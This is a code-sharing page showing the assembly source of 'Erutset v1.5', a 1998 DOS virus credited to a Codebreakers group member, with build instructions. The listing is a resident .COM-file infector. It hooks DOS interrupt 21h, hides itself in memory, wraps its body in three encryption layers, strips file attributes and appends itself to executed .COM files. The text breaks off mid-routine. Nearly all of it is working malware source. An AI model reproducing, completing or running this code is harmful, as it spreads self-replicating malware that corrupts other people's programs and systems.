📄 erutset.asm
字号:
; ------------------------------------------------------------------------- ;
; Erutset v1.5 coded by KilJaeden of the Codebreakers 1998 ;
; ------------------------------------------------------------------------- ;
; Description: `-------------------| Started: 19/06/98 | Finished: 19/06/98 ;
; `-------------------^------------------- ;
; v1.0 - Memory resident .com appender, infects upon execution | Size: 637 ;
; v1.1 - restores time/date & attributes also infects readonly `---------- ;
; v1.2 - now has a single layer of XOR,NEG,ROR encryption ;
; v1.3 - added a second layer of XOR,NEG,NOT,ROR,ROL encryption ;
; v1.4 - added a third layer of XOR,NEG,NOT,ROR,ROL encryption ;
; v1.5 - added a small payload, prints a string and waits for keypress ;
; ------------------------------------------------------------------------- ;
; --------> Dedicated to the hate of all the '31337 h4x0rs' on IRC <------- ;
; ------------------------------------------------------------------------- ;
; to compile ::] tasm erutset.asm ;
; to link :::::] tlink /t erutset.obj ;
; ------------------------------------------------------------------------- ;
code segment ; name our segment 'code'
assume cs:code,ds:code ; assign CS and DS to code
org 100h ; this be a .com file
.286 ; needed for pusha/popa
jumps ; save space wasted jumping
blank: db 0e9h,0,0 ; jump to start of code
start: call delta ; push IP on to stack
delta: pop bp ; pop it into bp
sub bp,offset delta ; get the delta offset
decr: jmp once ; jump to once (overwritten)
lea si,[bp+encd] ; load the source index up
mov di,si ; move it into DI
call encr ; decrypt the 1st layer
; --------------------( Start Of 1st Encryption Blanket )------------------ ;
; ------------------------------------------------------------------------- ;
encd: lea si,[bp+d_encd] ; load the source index up
mov di,si ; move it into DI again
mov cx,d_encr-d_encd ; # of bytes to decrypt
call d_encr ; decrypt the 2nd layer
; --------------------( Start Of 2nd Encryption Blanket )------------------ ;
; ------------------------------------------------------------------------- ;
d_encd: lea si,[bp+t_encd] ; load the source index up
mov di,si ; move it into DI again
mov cx,t_encr-t_encd ; # of bytes to decrypt
call t_encr ; decrypt the 3rd layer
; --------------------( Start Of 3rd Encryption Blanket )------------------ ;
; ------------------------------------------------------------------------- ;
t_encd: call pload ; check if payload time
mov ax,0deadh ; check if already resident
int 21h ; if we are, bx = 0deadh now
cmp bx,0deadh ; does bx hold 0deadh ?
je first3 ; we are already resident!
sub word ptr cs:[2],80h ; lower top of PSP mem data
mov ax,cs ; move CS into AX
dec ax ; decrement AX
mov ds,ax ; move AX into DS
sub word ptr ds:[3],80h ; sub 2kb from accessed MCB
xor ax,ax ; xor the value in ax to 0
mov ds,ax ; move that value into DS
sub word ptr ds:[413h],2 ; adjust BIOS data by 2kb
mov ax,word ptr ds:[413h] ; move adjusted BIOS data
mov cl,6 ; load cl with value of 6
shl ax,cl ; multiply BIOS mem by 64
mov es,ax ; move value into ES
push cs ; push value of code segment
pop ds ; into data segment register
xor di,di ; xor value in DI to 0
lea si,[bp+start] ; load the source index
mov cx,finished-start ; # of bytes to load up
rep movsb ; load virus into memory
xor ax,ax ; value in ax to 0
mov ds,ax ; move value into DS
lea ax,isr ; point IVT to new ISR
sub ax,offset start ; subtract start offset
mov bx,es ; move es into bx
cli ; interrupts off
xchg ax,word ptr ds:[84h] ; switch old/new int 21h
xchg bx,word ptr ds:[86h] ; switch old/new int 21h
mov word ptr es:[oi21-offset start],ax ; save the old int 21h
mov word ptr es:[oi21+2-offset start],bx ; save the old int 21h
sti ; interrupts on
push cs cs ; push code segment twice
pop ds es ; into DS and ES registers
first3: lea si,[bp+saved] ; load up the source index
mov di,100h ; load the destination index
push di ; push 100h on to the stack
movsw ; move two bytes now
movsb ; move one byte now
retn ; return control to host
; ------------------------------------------------------------------------- ;
; ------------------------------------------------------------------------- ;
isr: pushf ; push all flags
cmp ax,0deadh ; are we testing if resident?
jne exec ; nope, check for execution
mov bx,0deadh ; yup, show them we are here
popf ; pop all flags
iret ; pop cs:ip+flags from stack
exec: pusha ; push all registers
push ds ; push data segment register
push es ; push extra segment register
cmp ah,4bh ; something being executed?
je infect ; yup! infect the file
exit: pop es ; pop ES from the stack
pop ds ; pop DS from the stack
popa ; pop all registers
popf ; pop all flags
old21: db 0eah ; jump to original ISR
oi21 dd ? ; old int 21 goes here
ret ; return from call
; ------------------------------------------------------------------------- ;
; ------------------------------------------------------------------------- ;
infect: push bp ; save original delta offset
call tsrdel ; push IP on to stack again
tsrdel: pop bp ; pop it into bp
sub bp,offset tsrdel ; get the 2nd delta offset
push ds ; push DS on to stack
pop es ; pop it into es
mov di,dx ; move file handle into di
mov cx,64 ; 64 byte filename possible
mov al,'.' ; load al with the .
cld ; clear direction flag
repnz scasb ; scan until . is hit
cmp word ptr ds:[di],'OC' ; is the file .CO- ?
jne abort ; not it isn't, abort
cmp word ptr ds:[di+2],'M' ; is the file .--M ?
jne abort ; no it isn't, abort
mov ax,4300h ; get file attributes
int 21h ; get them now
push cx ; push the attributes
push dx ; push the file name
mov ax,4301h ; set file attributes
xor cx,cx ; to no attributes at all
int 21h ; ready for infection
mov ax,3d02h ; open the file read/write
int 21h ; open the file now
xchg bx,ax ; move the file handle
push cs cs ; push CS on to stack twice
pop ds es ; pop it into DS and ES
mov ax,5700h ; get time/date stamps
int 21h ; get them now
push dx ; save the date
push cx ; save the time
mov ah,3fh ; the read function
lea dx,[bp+saved] ; record the bytes here
mov cx,3 ; read first three bytes
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -